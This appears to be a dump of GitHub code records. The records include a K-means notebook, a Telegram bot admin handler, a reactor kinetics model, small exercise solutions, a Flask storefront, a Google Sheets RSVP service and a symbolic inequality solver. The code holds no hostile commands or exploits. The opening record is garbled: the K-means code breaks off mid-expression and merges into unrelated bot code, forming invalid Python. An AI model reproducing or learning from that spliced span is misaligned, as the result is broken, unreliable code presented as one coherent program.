[buildB(train_data,Dic), buildB(test_data,Dic)]')\n\n\n# ### postprocess feature vectors\n\n# In[129]:\n\n\"\"\"\nl^2 normalization\n\"\"\"\ndef 
l2normalize(data):\n    for vector in data:\n        L = np.linalg.norm(vector)\n        vector /= L\n\ndef standardize(data_b, size_dic):\n    s = np.array([0.0]*size_dic)\n    for bite in data_b:\n        s += bite\n    s_ = s/len(data_b)\n    vec = []\n    for bit in data_b:\n        vec.append(bit - s_)\n    return vec\n\n\n# In[130]:\n\n\"\"\"\ntrain_vec and test_vec will be the feature vectors used from here on.\n\"\"\"\nl2normalize(train_data_b), l2normalize(test_data_b)\n[train_vec, test_vec] = [standardize(train_data_b,len(Dic)), standardize(test_data_b,len(Dic))]\n\n\n# ### K-means\n\n# In[119]:\n\n\"\"\"\nRandomly picks two points from the sample set as initial centroids.\n`label` is a list indicating which cluster each vector is assigned to.\n`p` is the list of the two mean points that the model converged to.\nThe function first prints which two points were picked as initial\ncentroids and then how many times it iterated.\n\"\"\"\ndef KMeans_2(data,size_dic):\n    a = random.randint(0,len(data)-1)\n    b = random.randint(0,len(data)-1)\n    while a==b:\n        b = random.randint(0,len(data)-1)\n    p = np.array([data[a], data[b]])\n    print(\"point_init1 is \",a)\n    print(\"point_init2 is \",b)\n    label = [0]*len(data)\n    conver = False\n    count = 0\n    while not conver:\n        count += 1\n        conver = True\n        # reassign every point to its nearest centroid\n        for i in range(len(data)):\n            d = [0]*2\n            d[0] = np.linalg.norm(p[0]-data[i])\n            d[1] = np.linalg.norm(p[1]-data[i])\n            if d[label[i]] > d[1-label[i]]:\n                conver = False\n                label[i] = 1-label[i]\n        if not conver:\n            # recompute each cluster's centroid from its assigned points\n            for j in [0,1]:\n                n_p = 0\n                s_p = np.array([0.0]*size_dic)\n                for point in range(len(label)):\n                    if label[point] == j:\n                        s_p += data[point]\n                        n_p += 1\n                p[j] = s_p/n_p\n    print(\"iterate time is \",count)\n    return (label, p)\n\n\n# In[120]:\n\ndef n_kmeans(vec, k_train_label,kmeans_lib,size):\n    [k_label, k_p] = KMeans_2(vec, size)\n    n_bruce = 0\n    n_python = 0\n    for i in range(len(k_label)):\n        if k_train_label[i] == kmeans_lib.labels_[i]:\n            n_python+=1\n        if k_train_label[i] == k_label[i]:\n            n_bruce+=1\n    print(\"self-designed accuracy is\",n_bruce/len(k_label))\n    print(\" lib accuracy is\", n_python/len(k_label))\n    print(\"higher than lib?: \",n_python/len(k_label){title}\n\"\n                                         f\"(you can copy the original text by tapping on it)\",\n                                         reply_markup=get_cancel_button())\n        msg_id = callback.message.message_id\n        await state.update_data(msg=msg_id)\n    elif action==\"content\":\n        content = data[\"content\"]\n        await state.set_state(Edit.content)\n        await callback.message.edit_text(f\"Send the corrected text.\n\"\n                                         f\"{content}\n\"\n                                         f\"(you can copy the original text by tapping on it)\",\n                                         reply_markup=get_cancel_button())\n        msg_id = callback.message.message_id\n        await state.update_data(msg=msg_id)\n    else:\n        await state.clear()\n        await db.update_proffer(content=data[\"content\"], title=data[\"title\"], id_proffer=int(data[\"id_proffer\"]))\n        await callback.message.edit_text(text=f\"A new suggestion has arrived!\n\n\n\"\n                                         f\"{data['title']}\n\n\"\n                                         f\"{data['content']}\",\n                                         reply_markup=get_check_keyboard())\n\n@admin_router.message(Edit.title)\nasync def edit_title(message: types.Message, state: FSMContext):\n    new_title = message.text\n    if len(new_title) > 50:\n        await message.answer(\"The title must be no longer than 50 characters\")\n    else:\n        data = await state.get_data()\n        await state.update_data(title=new_title)\n        await message.delete()\n        await DeleteMessage(chat_id=message.chat.id, message_id=data[\"msg\"])\n        await state.set_state(Edit.edit)\n        await message.answer(\"The title has been updated. What would you like to change?\",\n                             reply_markup=get_edit_keyboard())\n\n@admin_router.message(Edit.content)\nasync def edit_content(message: types.Message, state: FSMContext):\n    new_text = message.text\n    if len(new_text) > 300:\n        await message.answer(\"The text must be no longer than 300 characters\")\n    else:\n        data = await state.get_data()\n        await state.update_data(content=new_text)\n        await message.delete()\n        await DeleteMessage(chat_id=message.chat.id, message_id=data[\"msg\"])\n        await state.set_state(Edit.edit)\n        await message.answer(\"The content has been updated. What would you like to change?\",\n                             reply_markup=get_edit_keyboard())\n\n@admin_router.callback_query(Text(text=\"cancel\"))\nasync def go_back(callback: types.CallbackQuery, state: FSMContext):\n    current_state = await state.get_state()\n    if current_state == \"Comment:comment\":\n        data = await state.get_data()\n        await callback.message.edit_text(text=data[\"msg1\"],\n                                         reply_markup=get_check_keyboard())\n    else:\n        await state.set_state(Edit.edit)\n        await callback.message.edit_text(\"What would you like to change?\",\n                                         reply_markup=get_edit_keyboard())\n\n@admin_router.message(Comment.comment)\nasync def comment_add(message: types.Message, state: FSMContext):\n    data = await state.get_data()\n    comment = message.text\n    await message.delete()\n    await DeleteMessage(chat_id=message.chat.id, message_id=data[\"msg\"])\n    try:\n        await db.update_proffer_comment(comment=comment, id_proffer=data[\"id_proffer\"])\n        await message.answer(f\"Comment added.\n\"\n                             f\"{data['msg1']}\",\n                             reply_markup=get_check_keyboard())\n        await state.clear()\n    except:\n        await message.answer(\"You may have used invalid characters.\n\"\n                             \"Please write your comment again\",\n                             reply_markup=get_cancel_button())\n        await state.update_data(msg=message.message_id, comment=comment)\n\n","repo_name":"M1GUSTA/platfrom_bot","sub_path":"tgbot/handlers/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":10813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"23522184151","text":"\"\"\"\nThis file contains some functions in Python which I think will be useful in the future\n\"\"\"\n\n\nclass PKModel(object):\n    def __init__(self,n=1.0,beta=[0.000215,0.001424,0.001274,0.002568,0.000748,0.000273],llambda=[0.0124,0.0305,0.111,0.301,1.14,3.01],promptGeT=2.0e-5):\n        self.n=n\n        self.beta=beta\n        self.llambda=llambda\n        self.promptGeT=promptGeT\n        self.precCon=[]\n\n        self.sumbeta=0.0\n        for i in self.beta:\n            self.sumbeta+=i\n\n        self.check()\n        self.calcpreCon()\n\n    def check(self):\n        if len(self.beta)!=len(self.llambda):\n            print(\"The lengths of beta and llambda are not equal.\")\n\n    def calcpreCon(self):\n        for i in range(len(self.beta)):\n            self.precCon.append(self.beta[i]*self.n/self.promptGeT/self.llambda[i])\n\n    def nextTimeStep(self,rho,dt=0.0001):\n        # split a long step into 0.0001 s sub-steps plus a remainder b\n        if dt>0.0001:\n            a = int(dt/0.0001)\n            b = dt%0.0001\n            dt = 0.0001\n        else:\n            a = 1\n            b = -1.0\n\n        for i in range(a):\n\n            self.dn=rho/self.promptGeT*self.n*dt\n\n            self.dCon=[]\n\n            for i in range(len(self.beta)):\n                self.dCon.append((self.beta[i]/self.promptGeT*self.n-self.llambda[i]*self.precCon[i])*dt)\n                self.dn-=self.dCon[-1]\n            
#print(self.dn)\n #print(self.precCon)\n self.synchronize() \n \n \n def synchronize(self):\n self.n+=self.dn\n for i in range(len(self.beta)):\n self.precCon[i]+=self.dCon[i]\n\n\nif __name__==\"__main__\":\n \n import matplotlib.pyplot as plt\n\n reactor = PKModel(n=10000)\n #print(reactor.precCon)\n n=[]\n time=[]\n n.append(reactor.n)\n time.append(0)\n\n dt=0.011\n for i in range(100):\n time.append(dt*(i+1))\n reactor.nextTimeStep(-5.0e-3,dt)\n n.append(reactor.n)\n \n reactor2 = PKModel(n=10000)\n n2=[10000]\n time2=[0]\n dt=0.0001\n for i in range(100000):\n time2.append(dt*(i+1))\n reactor2.nextTimeStep(-5.0e-3,dt)\n n2.append(reactor2.n)\n\n\n fig = plt.figure()\n\n ax = fig.add_axes([0.1, 0.1, 0.6, 0.75])\n\n ax.plot(time, n)\n ax.plot(time2, n2)\n\n reactor3 = PKModel(n=10000)\n time=[0,0.1,1,5,10]\n dt=[]\n n3 = [10000]\n for i in range(len(time)-1):\n dt=time[i+1]-time[i]\n reactor3.nextTimeStep(-5.0e-3,dt)\n n3.append(reactor3.n)\n ax.plot(time, n3,\"bo\") \n plt.show()\n ","repo_name":"Vincentdudu123/PackageNuclear","sub_path":"src/PKModel.py","file_name":"PKModel.py","file_ext":"py","file_size_in_byte":2933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"17979183451","text":"import sys\ninput = sys.stdin.readline\n# f = open('input.txt', 'r')\n# input = f.readline\n\nn = int(input())\nmat = []\nfor i in range(n):\n mat.extend(list(map(int,list(input().strip()))))\n\ndef rec(n,lst):\n k = sum(lst)\n\n if k== 0:\n return '0'\n elif k== n**2:\n return '1'\n else :\n lst1 = []\n lst2 = []\n lst3 = []\n lst4 = []\n for i in range(n//2):\n lst1.extend(lst[i*n:i*n+n//2])\n lst2.extend(lst[i*n+n//2:(i+1)*n])\n lst3.extend(lst[(n//2)*n + i*n:(n//2)*n + i*n + n//2 ])\n lst4.extend(lst[(n//2)*n+i*n+n//2:(n//2)*n+(i+1)*n])\n m = n//2\n return f'({rec(m,lst1)}{rec(m,lst2)}{rec(m,lst3)}{rec(m,lst4)})'\n\n\nprint(rec(n,mat))","repo_name":"DailyStudy08/jiyoung_backjoon","sub_path":"class1/1992.py","file_name":"1992.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"7211371839","text":"'''\nSoma de Impares Consecutivos I\n'''\n\nx = int(input())\ny = int(input())\n\nif x < y:\n start = x\n end = y\nelse:\n start = y\n end = x\n\nresult = 0\n\nfor i in range(start+1, end):\n if i % 2 != 0:\n result += i\n\nprint(result)","repo_name":"demmorou/uri-answers","sub_path":"1071.py","file_name":"1071.py","file_ext":"py","file_size_in_byte":239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"17053788479","text":"from ..searcher.searcher import Searcher\nfrom ..general import ALG_BM25, m_c2p, TO_JUPYTER\nimport logging\nimport string\nimport os\nfrom shutil import copyfile\n\nclass Tester:\n def __init__(self):\n self.searcher = Searcher(algorithm=ALG_BM25, idxVarFile='invIdxVar-obo-lemma-low')\n self.viewTemplate = string.Template(\"\"\"\n
<div>\n        <h3>\n            ${header}\n        </h3>\n        <div>\n            ${content}\n        </div>\n    </div>\n    \"\"\")\n        self.staticDir = os.path.join(os.path.abspath(''),'static')\n        if not os.path.exists(self.staticDir):\n            os.makedirs(self.staticDir)\n\n    def searchSedmls(self, query, top=10, page=1):\n        result = self.searcher.search(query, top=top, page=page)\n        html=''\n        for rs, val in result['candidates'].items():\n            header = 'SEDML: <a href=\"%s\">
%s</a><br>'%(val['url'],val['url'])\n            content = ''\n\n            for imageLink in [val['path']]:\n                if not os.path.isfile(os.path.join(self.staticDir, imageLink.rsplit('/',1)[1])):\n                    copyfile(imageLink, os.path.join(self.staticDir, imageLink.rsplit('/',1)[1]))\n                content += '<img src=\"static/%s\" alt=\"drawing\" width=\"400\"/><br>'%imageLink.rsplit('/',1)[1]\n\n            if 'cellmlImages' in val:\n                for imgUrl in val['cellmlImages']:\n                    content += '<img src=\"%s\" alt=\"drawing\" width=\"400\"/><br>'%imgUrl\n\n            content += 'CellML: <a href=\"%s\">%s</a><br>'%(val['cellmlUrl'],val['cellmlUrl'])\n            content += 'Workspace: <a href=\"%s\">%s</a><br>'%(val['workspaceUrl'],val['workspaceUrl'])\n            # print exposures\n            if len(val['exposures']) > 0:\n                content += 'Exposures:<br>    '\n                for cellmlUrl in val['exposures']:\n                    content += '<br>  • <a href=\"%s\">%s</a>'%(cellmlUrl,cellmlUrl)\n                content += '<br>'\n\n            # print similar cellmls\n            if len(val['similarCellmls']) > 0:\n                content += 'Similar CellMLs:<br>    '\n                for cellmlUrl in val['similarCellmls']:\n                    content += '<br>  • <a href=\"%s\">%s</a>'%(cellmlUrl,cellmlUrl)\n                content += '<br>'\n\n            # print maths and dependencies\n            content += '<br>    '\n            for varId, varData in val['variable'].items():\n                content += self.__printMath(varData)\n            content += '<br>    '\n            content += '<br>'\n\n            # replace value in html template\n            replacer = {'header':header, 'content':content}\n            html += self.viewTemplate.substitute(replacer)\n        return {'html':html, 'page':page, 'top':top, 'length':result['length']}\n\n    def __printMath(self, varData):\n        def getVarMd(varData):\n            logger = logging.getLogger()\n            varMd = '<br>  • ' + '; '.join(['name: %s'%varData['name'], 'type: %s'%varData['type'], 'init: %s'%varData['init']])\n            if 'rate' in varData:\n                varMd += '; rate: %s'%str(varData['rate'])\n            varMd += '; unit: ' + varData['unit']['text'] + '<br>    ' if 'unit' in varData else '<br>    '\n            for k, mth in varData['math'].items():\n                logger.disabled = True\n                lttex = m_c2p(mth, destination=TO_JUPYTER)\n                varMd += lttex + \"<br>    \"\n\n            if 'dependent' in varData:\n                if len(varData['dependent']) > 0:\n                    varMd += '<br>      • dependents: '\n                    for varIdDept, varDataDept in varData['dependent'].items():\n                        varMd += getVarMd(varDataDept)\n                    varMd += '<br>    '\n            logger.disabled = False\n\n            return varMd + '<br>'\n\n        varMd = getVarMd(varData)\n        return varMd\n\n    def searchVariables(self, query, top=10, page=1):\n        result = self.searcher._Searcher__getVariables(query, top=top, page=page)\n        html = ''\n        for rs, val in result['candidates'].items():\n            header = '; '.join(['name: %s'%val['name'], 'type: %s'%val['type'], 'init: %s'%str(val['init'])])\n            if 'rate' in val:\n                header += '; rate: %s'%str(val['rate'])\n            header += '; unit: ' + val['unit']['text'] if 'unit' in val else ''\n            content = 'CellML: <a href=\"%s\">%s</a><br>    '%(val['cellmlUrl'],val['cellmlUrl'])\n            content += 'Workspace: <a href=\"%s\">%s</a><br>    '%(val['workspaceUrl'],val['workspaceUrl'])\n            # print exposures\n            if len(val['exposures']) > 0:\n                content += 'Exposures:<br>      '\n                for cellmlUrl in val['exposures']:\n                    content += '<br>    • <a href=\"%s\">%s</a>'%(cellmlUrl,cellmlUrl)\n                content += '<br>    '\n\n            # print similar cellmls\n            if len(val['similarCellmls']) > 0:\n                content += 'Similar CellMLs:<br>      '\n                for cellmlUrl in val['similarCellmls']:\n                    content += '<br>    • <a href=\"%s\">%s</a>'%(cellmlUrl,cellmlUrl)\n                content += '<br>    '\n\n            # print images\n            if 'cellmlImages' in val:\n                for imgUrl in val['cellmlImages']:\n                    content += '<img src=\"%s\" alt=\"drawing\" width=\"400\"/><br>    '%imgUrl\n\n            content += self.__printMath(val)\n            content += '<br>
    '\n\n replacer = {'header':header, 'content':content}\n html += self.viewTemplate.substitute(replacer)\n\n return {'html':html, 'page':page, 'top':top, 'length':result['length']}\n","repo_name":"napakalas/casbert-indexer","sub_path":"casbert_indexer/tester/tester.py","file_name":"tester.py","file_ext":"py","file_size_in_byte":5936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"43573220881","text":"def Preprocessing_msg(data):\n names=['Amit','Charlie','Debbie','Jim','Triveni']\n unames=['amit','charlie','dsk','jim','triveni']\n ctr=0\n labels=[]\n messages=[]\n noise=0\n for line in data:\n seg= line.strip().lower().replace('<','').split('>')\n #print(seg)\n if len(seg) < 2:\n #print(seg)\n noise +=1\n elif len(seg) > 2:\n #print(seg)\n noise += 1\n else:\n for name in unames:\n if name in seg[0]:\n labels.append(names[unames.index(name)])\n messages.append(seg[1])\n ctr+=1\n return messages, labels\n\n#hlogs = open('logs.log',\"r\")\n#data = hlogs.readlines()\n#X,y = Preprocessing_msg(data)\n#print(y)","repo_name":"amitrecords/whoami","sub_path":"whoami/funk.py","file_name":"funk.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"40384925280","text":"import secrets\nfrom flask import Flask, render_template, request\nfrom flask_login import LoginManager, login_required, current_user\nfrom api.model.user import User\nfrom api.model.store import Store\nfrom api.route.auth import auth_bp\nfrom api.route.store import store_bp, decodeStore\nfrom api.route.item import item_bp, decodeItem\nfrom api.services.database import get_stores, get_store, get_items, get_item\n\napp = Flask(__name__)\napp.register_blueprint(auth_bp, url_prefix=\"/api\")\napp.register_blueprint(store_bp, url_prefix=\"/api\")\napp.register_blueprint(item_bp, url_prefix=\"/api\")\n\napp.config[\"SECRET_KEY\"] = secrets.token_hex(24)\n\nlogin_manager = LoginManager()\nlogin_manager.init_app(app)\n\n@login_manager.user_loader\ndef load_user(user_id):\n return User(user_id)\n\n@app.route(\"/\")\ndef home():\n return render_template(\"home.html\")\n\n@app.route(\"/login\")\ndef login():\n return render_template(\"login.html\")\n\n@app.route(\"/create_account\")\ndef create_account():\n return render_template(\"create_account.html\")\n\n@app.route(\"/dashboard\")\n@login_required\ndef dashboard():\n stores = get_stores(current_user.id)\n\n result = []\n for store in stores:\n result.append(decodeStore(store))\n\n return render_template(\"dashboard.html\", data=result)\n\n@app.route(\"/store\")\n@login_required\ndef store():\n store_id = request.args.get(\"store_id\")\n store_result = decodeStore(get_store(store_id=store_id))\n \n items_result = []\n items = get_items(store_id=store_id)\n for item in items:\n items_result.append(decodeItem(item))\n\n return render_template(\"store.html\", data=store_result, items=items_result)\n\n@app.route(\"/item\")\n@login_required\ndef item():\n item_id = request.args.get(\"item_id\")\n item_get = get_item(item_id=item_id)\n return render_template(\"product.html\", data=decodeItem(item_get))\n\nif __name__ == '__main__':\n app.run(port=8000, debug=True)","repo_name":"gabeiglio/Storefront","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"16660037107","text":"from django.shortcuts import 
render\nimport requests\n\n# Create your views here.\ndef list (request):\n\turl = \"https://pokeapi.co/api/v2/pokemon/\"\n\n\tnxt = request.GET.get('nextPage')\n\tprev = request.GET.get('prevPage')\n\n\tif nxt:\n\t\tprint(nxt)\n\t\tprint(type(nxt))\n\t\tresponse = requests.get(nxt).json()\n\telif prev:\n\t\tprint(prev)\n\t\tprint(type(prev))\n\t\tresponse = requests.get(prev).json()\n\telse:\n\t\tresponse = requests.get(url).json()\n\n\tcontext = {\n\t\t'response': response,\n\t}\n\n\treturn render (request, \"list.html\", context)\n\ndef detail (request):\n\turl = request.GET.get('detail')\n\tresponse = requests.get(url).json()\n\n\tcontext = {\n\t\t\"results\": response,\n\t}\n\n\treturn render (request, \"detail.html\", context)\n\n","repo_name":"Mariam-Haitham/API","sub_path":"my_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"11872711285","text":"import pygame\nfrom Button import Button\n\n\nclass App:\n clock = pygame.time.Clock()\n game_exit = False\n\n def __init__(self, title, width, height, background_color=(255, 255, 255)):\n self.title = title\n self.width = width\n self.height = height\n self.background_color = background_color\n\n self.game_display = pygame.display.set_mode((width, height), pygame.SRCALPHA)\n\n self.button = Button(self.game_display, 0, 0, 100, 100, (255, 0, 0), \"Hello World\", \"Arial\", 10, (0, 0, 0))\n\n pygame.display.set_caption(title)\n self.main_loop()\n\n def main_loop(self):\n while not self.game_exit:\n\n for event in pygame.event.get():\n self.handle_keys(event)\n\n self.game_display.fill(self.background_color)\n self.render(self.game_display)\n pygame.display.update()\n self.update()\n self.clock.tick(60)\n\n def render(self, game_display):\n self.button.draw_button()\n\n def update(self):\n pass\n\n def handle_keys(self, event):\n if event.type == pygame.QUIT:\n self.game_exit = True\n\nif __name__ == \"__main__\":\n pygame.init()\n App(\"\", 500, 500)\n pygame.quit()\n exit()","repo_name":"GeburtstagsTorte/Homework","sub_path":"Homework Solution/Vlad/Button Fix/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"72425859321","text":"import gspread\nimport json\nimport logging\nimport re\nfrom google.appengine.api import memcache\nfrom oauth2client.client import SignedJwtAssertionCredentials\n\n# credentials.json file from Google Cloud Console.\n# See: http://gspread.readthedocs.org/en/latest/oauth2.html\nCONFIG = json.load(open('credentials.json'))\nscope = ['https://spreadsheets.google.com/feeds']\n\ncredentials = SignedJwtAssertionCredentials(CONFIG['client_email'],\n CONFIG['private_key'].encode(), scope)\n\nDATA_WORKSHEET_NAME = \"Data\"\nCOL_INFO_NAME_PRIMARY = 1\n\nCOL_NAMES = [\n \"primaryName\",\n \"mailingName\",\n \"expectedGuests\",\n \"expectedHeadCount\",\n \"brideOrGroom\",\n \"category\",\n \"addressStreet\",\n \"addressCity\",\n \"addressState\",\n \"addressZipCode\",\n \"sdEnvelopePrinted\",\n \"invEnvelopePrinted\",\n \"rsvpCode\",\n \"rsvpResponseMethod\",\n \"rsvpAttending\",\n \"rsvpHeadcount\",\n \"rsvpComments\",\n \"rsvpGuestNames\",\n]\n\nCOL_INDEXES = {}\nCOL_LETTERS = {}\n\n# NOTE This just dynamically generates all the column indexes with their\n# names from above. 
This is easier in case I need to change the schema of\n# my spreadsheet later: I can just enter the new column in the list above\n# in its appropriate place and not have to worry about recalculating all\n# the indexes.\ndef magicIndexes():\n count = 1\n for name in COL_NAMES:\n COL_INDEXES[name] = count\n # This little hack will work as long as we stay under 26 columns\n COL_LETTERS[name] = chr((count - 1) + ord(\"A\"))\n count += 1\nmagicIndexes()\n\nSHARED_SERVICE = None\nSERVICE_CACHE_KEY = 'gspread'\n\n\ndef get_service():\n service = memcache.get(SERVICE_CACHE_KEY)\n if service is None:\n service = gspread.authorize(credentials)\n memcache.add(key=SERVICE_CACHE_KEY, value=service, time=3600)\n return service\n\n\nclass SpreadsheetService(object):\n\n spreadsheet_id = CONFIG['spreadsheet_id'] # For privacy.\n\n service = None\n spreadsheet = None\n worksheet = None\n\n def __init__(self):\n self.service = get_service()\n self.__getSpreadsheet()\n\n def __getSpreadsheet(self):\n if self.spreadsheet is None or self.worksheet is None:\n self.spreadsheet = self.service.open_by_key(self.spreadsheet_id)\n self.worksheet = self.spreadsheet.worksheet(DATA_WORKSHEET_NAME)\n\n def __findRowForCode(self, code):\n \"\"\"Finds the row of the spreadsheet which corresponds to a\n given RSVP code.\"\"\"\n\n # Find the number in the code and convert it to an integer.\n # Codes come in a format like this: `JONES5` where the final number\n # is the spreadsheet row number. This lets us find it in constant time.\n row_number = map(lambda e: int(e), re.findall('\\d+', code))\n if len(row_number):\n return row_number[0]\n\n def __fetchRowByNumberWithCode(self, row_number, code):\n \"\"\"Fetches a row by number, verifies it matches the code, and returns\n it if it does.\"\"\"\n # Now that we have a row number, let's make sure that it actually\n # matches. 
If it doesn't, we implicitly return None.\n row = self.worksheet.row_values(row_number)\n if row and self.__getValueFromRow(row, 'rsvpCode').lower() == code.lower():\n return row\n\n def __writeValue(self, row_number, col_name, value):\n \"\"\"Convenience method for writing a value to the spreadsheet.\"\"\"\n self.worksheet.update_cell(row_number, COL_INDEXES[col_name], value)\n\n def __getValueFromRow(self, row, col_name):\n \"\"\"Just a convenience accessor to get values from\n certain columns of a row.\"\"\"\n try:\n return row[COL_INDEXES[col_name] - 1]\n except IndexError:\n return None\n\n def guestLookup(self, code):\n \"\"\"Returns information about a guest based on their invite code.\"\"\"\n row_number = self.__findRowForCode(code)\n row = self.__fetchRowByNumberWithCode(row_number, code)\n\n if not row:\n return {\n \"status\": \"failed\",\n \"message\": \"A guest with that invite code was not found.\"\n }\n\n return {\n \"status\": \"success\",\n \"guest\": {\n \"code\": code,\n \"primaryName\": self.__getValueFromRow(row, \"primaryName\"),\n \"expectedGuests\": self.__getValueFromRow(row, \"expectedGuests\")\n }\n }\n\n def RSVP(self, code, attending, headcount, guests, comments=\"\"):\n row_number = self.__findRowForCode(code)\n row = self.__fetchRowByNumberWithCode(row_number, code)\n\n if not row:\n return {\n 'status': 'invalid',\n 'fields': ['rsvpCode']\n }\n\n rsvp_range = \"%s%d:%s%d\" % (COL_LETTERS[\"rsvpResponseMethod\"], row_number,\n COL_LETTERS[\"rsvpGuestNames\"], row_number)\n\n # This quirky method allows us to update them in a batch.\n selection = self.worksheet.range(rsvp_range)\n values = [\n \"Online\",\n \"YES\" if attending else \"NO\",\n headcount if attending else 0,\n comments,\n guests\n ]\n\n for cell, value in zip(selection, values):\n cell.value = value\n\n self.worksheet.update_cells(selection)\n\n return {\n 'status': 'success'\n }\n","repo_name":"zacharytamas/matrimony2","sub_path":"spreadsheet_api.py","file_name":"spreadsheet_api.py","file_ext":"py","file_size_in_byte":4935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"11382372769","text":"import csv\nimport os.path\nfrom src.compas import direction\nfrom typing import Optional\n\n\ndef printing(data: Optional[dict], out_name: str) -> str:\n if data is None:\n return \"Please, check api key\"\n else:\n headers = None if os.path.exists(out_name) else data.keys()\n with open(out_name, \"a\", newline='') as f:\n writer = csv.writer(f)\n if headers is not None:\n writer.writerow(headers)\n writer.writerow(data.values())\n return f\"Weather in {data['city']}\\n\" \\\n f\"Country: {data['country']}\\n\" \\\n f\"State: {data['state']}\\n\" \\\n f\"Temperature: {data['temp']} \\N{degree sign}C\\n\" \\\n f\"Humidity: {data['hum']} %\\n\" \\\n f\"Wind speed: {data['windspeed']} m/s\\n\" \\\n f\"Wind direction: {direction(data['winddeg'])}\\n\" \\\n f\"By {data['provider']}\"\n","repo_name":"Idvon/Pogodnik","sub_path":"src/conclusion.py","file_name":"conclusion.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"14019086497","text":"import numpy as np\nfrom random import randint, uniform, shuffle\n\nboundmax = 10000\nnum = '0123456789'\nalpha = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'\noper = '+-*/'\nrel = '=><'\n\nclass SYM:\n def __init__(self, name, sys):\n self.name = name\n self.bounds = [-boundmax, boundmax]\n self.value 
= 0\n self.isknown = False\n self.bounddist = self.bounds[1]-self.bounds[0]\n self.constraints = self.get_symbolic_constraints(sys)\n self.isdisjointwithsys = False\n \n def updatebounds(self, low, high):\n self.bounds = [round(low,1), round(high,1)]\n self.bounddist = self.bounds[1]-self.bounds[0]\n if self.bounddist > 0:\n self.value = round(uniform(self.bounds[0], self.bounds[1]), 1)\n self.isknown = False\n else:\n self.value = round(self.bounds[0],1)\n self.isknown = True\n \n def get_symbolic_constraints(self, sys):\n constraints = list()\n\n for ineq in sys:\n if self.name in ineq:\n if '=' in ineq:\n relation = '='\n if '>' in ineq:\n relation = '>'\n if '<' in ineq:\n relation = '<'\n\n splitineq = str.split(ineq, relation)\n LHS = splitineq[0]\n RHS = splitineq[1]\n \n Llist = str.split(LHS, ' ')[:-1]\n Rlist = str.split(RHS, ' ')[1:]\n \n if self.name in Llist or self.name in Rlist:\n\n if self.name in Rlist:\n temp = Rlist\n Rlist = Llist\n Llist = temp\n if relation != '=':\n if relation == '<':\n rela = '>'\n if relation == '>':\n rela = '<'\n relation = rela\n \n delidxs = list()\n for i in range(len(Llist)):\n if len(Llist[i]) > 1:\n elem = Llist[i][0]\n else:\n elem = Llist[i]\n if elem in alpha and Llist[i] != self.name:\n if i==0:\n Rlist.append('-')\n Rlist.append(Llist[i])\n delidxs.append(i)\n\n else:\n if Llist[i-1] == '+':\n Rlist.append('-')\n else:\n Rlist.append('+')\n Rlist.append(Llist[i])\n delidxs.append(i)\n delidxs.append(i-1)\n if Llist[i] == self.name and i > 0:\n delidxs.append(i-1)\n\n\n delidxs.sort()\n count = 0\n for i in delidxs:\n Llist.pop(i-count)\n count = count + 1\n\n RHS = ''\n for i in range(len(Rlist)):\n RHS = RHS + Rlist[i]\n if i < len(Rlist)-1:\n RHS = RHS + ' '\n \n \n ## This is probably unnecesary. 
#####################\n \n if RHS in num:\n if relation == '=':\n self.updatebounds(round(float(RHS),1),round(float(RHS),1))\n if relation == '>':\n self.updatebounds(round(float(RHS),1),boundmax)\n if relation == '<':\n self.updatebounds(-boundmax,round(float(RHS),1))\n if len(RHS)>1:\n if RHS[0] not in alpha and RHS[1] in num:\n if relation == '=':\n self.updatebounds(round(float(RHS),1),round(float(RHS),1))\n if relation == '>':\n self.updatebounds(round(float(RHS),1),boundmax)\n if relation == '<':\n self.updatebounds(-boundmax,round(float(RHS),1))\n\n #####################################################\n \n\n constraint = {'relation': relation, 'expression': RHS}\n constraints.append(constraint)\n\n return constraints\n\ndef extract_symbols(sys_ineq):\n syms = list()\n for i in range(len(sys_ineq)):\n components = str.split(sys_ineq[i], ' ')\n for j in range(len(components)):\n if len(components[j]) > 1:\n if components[j][0] in alpha:\n syms.extend([components[j]])\n else:\n if components[j] in alpha:\n syms.extend([components[j]])\n syms = list(set(syms))\n for i in range(len(syms)):\n syms[i] = SYM(syms[i], sys_ineq)\n return syms\n\ndef intersection(b1, b2, rel=None):\n if rel == None:\n rel = '='\n\n inter = [0,0]\n if rel == '=':\n if b2[0]>b1[1] or b1[0]>b2[1]:\n return 'disjoint'\n else:\n inter[0] = max(b1[0],b2[0])\n inter[1] = min(b1[1],b2[1])\n return inter\n\n if rel == '>':\n if b1[1] < b2[0]:\n return 'disjoint'\n else:\n inter[0] = max(b1[0],b2[0])\n inter[1] = min(b1[1],b2[1])\n return inter\n\n if rel == '<':\n if b1[0] > b2[1]:\n return 'disjoint'\n else:\n inter[0] = max(b1[0],b2[0])\n inter[1] = min(b1[1],b2[1])\n return inter\n\ndef update_bounds(syms):\n\n names = ['']*len(syms)\n for i in range(len(names)):\n names[i] = syms[i].name\n \n for sym in syms:\n if sym.isknown == False:\n for constraint in sym.constraints:\n relation = constraint['relation']\n RHS = str.split(constraint['expression'])\n \n RHSbound = [0,0]\n for i in range(len(RHS)):\n if 